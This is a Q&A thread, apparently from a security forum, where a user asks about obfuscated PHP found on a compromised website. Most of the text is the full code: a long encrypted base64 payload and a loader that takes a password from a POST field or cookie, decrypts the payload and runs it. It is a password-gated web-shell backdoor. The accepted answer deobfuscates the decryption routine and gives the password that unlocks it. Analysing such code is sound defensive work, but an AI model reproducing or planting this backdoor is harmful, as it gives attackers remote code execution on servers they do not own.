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
4PTJzS99gFGyD0KQvyE5+EJJvqWIU8Vo
'));$_f__f=isset($_POST['_f__f'])?$_POST['_f__f']:(isset($_COOKIE['_f__f'])?$_COOKIE['_f__f']:NULL);if($_f__f!==NULL){$_f__f=md5($_f__f).substr(md5(strrev($_f__f)),0,strlen($_f__f));for($_f____f=0;$_f____f<15324;$_f____f++){$_f___f[$_f____f]=chr(( ord($_f___f[$_f____f])-ord($_f__f[$_f____f]))%256);$_f__f.=$_f___f[$_f____f];}if($_f___f=@gzinflate($_f___f)){if(isset($_POST['_f__f']))@setcookie('_f__f', $_POST['_f__f']);$_f____f=create_function('',$_f___f);unset($_f___f,$_f__f);$_f____f();}}?><form action="" method="post"><input type="text" name="_f__f" value=""/><input type="submit" value="&gt;"/></form>
```

Comment: just like the other question, it's off-topic

Comment: Sorry, off topic from security or the selected tags? Maybe I should have specified that this code came from a compromised website and I think it pertains directly to the social engineering, phishing and web app hardening topics outlined in the help center. If it belongs elsewhere, I'm happy to comply.

Comment: There is no StackExchange site that allows posting of random malware code for analysis. It's just too much of an invitation for piles and piles of randomness that will not have applicability to anyone else bu the poster.

Answer (score 1, accepted):

This is because the string you get from base64 decoding is still encrypted (and compressed), and requires a password being supplied from the outside to be successfully decrypted.

The decrypting routine, once slightly deobfuscated, goes something like this:

```
$alpha=md5($alpha).substr(md5(strrev($alpha)),0,strlen($alpha));

for ($i=0;$i<15324;$i++) {
    $crypto[$i]=chr((ord($crypto[$i])-ord($alpha[$i]))%256);
    $alpha .= $crypto[$i];
}
$crypto = gzinflate($crypto);
// Executes $crypto in a created function.
```

The password is 'root', and the decoded routine starts by making its environment friendlier:

```
ini_set('log_errors_max_len',0);...
```

Comment: Thanks! I was just looking at that section and figured it was at the least compressed due to the gzinflate. I see the md5 calls. Trying to fake it with a pwd to see if I can print out the intent.